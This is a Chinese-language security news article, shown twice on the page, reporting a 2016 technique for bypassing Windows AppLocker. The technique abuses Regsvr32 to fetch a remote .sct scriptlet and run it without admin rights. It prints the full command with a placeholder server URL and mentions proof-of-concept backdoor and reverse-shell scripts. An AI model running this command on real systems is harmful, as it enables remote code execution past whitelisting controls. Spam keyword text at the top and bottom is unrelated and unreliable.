精品国产一级在线观看,国产成人综合久久精品亚洲,免费一级欧美大片在线观看

當前位置:安全企業動態 → 正文

Windows AppLocker被繞過:攻擊者可不提權聯網注入DLL

責任編輯:editor006 |來源:企業網D1Net  2016-04-22 16:21:48 本文摘自:cnBeta.COM

AppLocker是Windows 7和Windows Server 2008 R2中引入的一項安全功能,旨在幫助管理員們指定哪個用戶或用戶組能夠訪問/運行某一個文件。然而據外媒報道,已經有人找到了利用Windows系統中Regsvr32命令行工具的某個隱藏特性,來繞過Windows AppLocker安全措施并正常注冊動態鏈接庫(DLLs)的方法。

Regsvr32則是一款可被安裝工具(或批處理腳本)使用,以便快速注冊動態鏈接庫的腳本工具。

照理說,微軟既然把這款“中性”而又危險的工具留在系統中,就應該管好它不被管理員之外的人所濫用。但遺憾的是,我們幾乎不可能檢測到這種類型的攻擊。

據安全研究人員Casey Smith所述,當攻擊者在某臺受感染的工作站上立足之后,就可以濫用Regsvr32、通過網絡下載一個COM腳本程序(.sct文件),然后在本地機器上注冊一個DLL。

更糟糕的是,攻擊者甚至無需取得管理員權限。Regsvr32可借助代理和TLS連接、重定向等功能,并且它擁有微軟自家的證書,所以可以執行任何看似正常的背景活動命令。

下面是標準的Regsvr32參數、以及而已命令的對比:

regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname

regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

Smith還指出,“regsvr32能夠接收的腳本網址沒有很好的記錄,要觸發這一‘旁路’,可以把內置VB和JS元素的代碼塊放進去”。

在進一步的測試中,研究人員還在GitHub上放出了系統管理員能夠下載的“概念驗證腳本”(通過Regsvr32并打開一個后門、或者基于HTTP的反向shell)。

從理論上來說,這種類型的“漏洞”允許攻擊者訪問注冊所有DLL,然后在被感染的計算機上執行惡意代碼,更別說管理員權限了。

關鍵字:DLL攻擊者JSGitHub

本文摘自:cnBeta.COM

x Windows AppLocker被繞過:攻擊者可不提權聯網注入DLL 掃一掃
分享本文到朋友圈
當前位置:安全企業動態 → 正文

Windows AppLocker被繞過:攻擊者可不提權聯網注入DLL

責任編輯:editor006 |來源:企業網D1Net  2016-04-22 16:21:48 本文摘自:cnBeta.COM

AppLocker是Windows 7和Windows Server 2008 R2中引入的一項安全功能,旨在幫助管理員們指定哪個用戶或用戶組能夠訪問/運行某一個文件。然而據外媒報道,已經有人找到了利用Windows系統中Regsvr32命令行工具的某個隱藏特性,來繞過Windows AppLocker安全措施并正常注冊動態鏈接庫(DLLs)的方法。

Regsvr32則是一款可被安裝工具(或批處理腳本)使用,以便快速注冊動態鏈接庫的腳本工具。

照理說,微軟既然把這款“中性”而又危險的工具留在系統中,就應該管好它不被管理員之外的人所濫用。但遺憾的是,我們幾乎不可能檢測到這種類型的攻擊。

據安全研究人員Casey Smith所述,當攻擊者在某臺受感染的工作站上立足之后,就可以濫用Regsvr32、通過網絡下載一個COM腳本程序(.sct文件),然后在本地機器上注冊一個DLL。

更糟糕的是,攻擊者甚至無需取得管理員權限。Regsvr32可借助代理和TLS連接、重定向等功能,并且它擁有微軟自家的證書,所以可以執行任何看似正常的背景活動命令。

下面是標準的Regsvr32參數、以及而已命令的對比:

regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname

regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

Smith還指出,“regsvr32能夠接收的腳本網址沒有很好的記錄,要觸發這一‘旁路’,可以把內置VB和JS元素的代碼塊放進去”。

在進一步的測試中,研究人員還在GitHub上放出了系統管理員能夠下載的“概念驗證腳本”(通過Regsvr32并打開一個后門、或者基于HTTP的反向shell)。

從理論上來說,這種類型的“漏洞”允許攻擊者訪問注冊所有DLL,然后在被感染的計算機上執行惡意代碼,更別說管理員權限了。

關鍵字:DLL攻擊者JSGitHub

本文摘自:cnBeta.COM

電子周刊
回到頂部

關于我們聯系我們版權聲明隱私條款廣告服務友情鏈接投稿中心招賢納士

企業網版權所有 ©2010-2024 京ICP備09108050號-6 京公網安備 11010502049343號

^
  • <menuitem id="jw4sk"></menuitem>

  • 主站蜘蛛池模板: 同心县| 临夏市| 彝良县| 包头市| 乌鲁木齐县| 龙海市| 普格县| 靖边县| 长白| 西和县| 天门市| 镇原县| 名山县| 安吉县| 株洲市| 丰原市| 绥棱县| 扬中市| 长泰县| 临泉县| 夏邑县| 韶关市| 广东省| 德江县| 雅江县| 毕节市| 冷水江市| 中卫市| 天等县| 靖西县| 茶陵县| 农安县| 高台县| 吉安市| 凤城市| 永川市| 阿克苏市| 阿巴嘎旗| 滨州市| 鄢陵县| 安福县|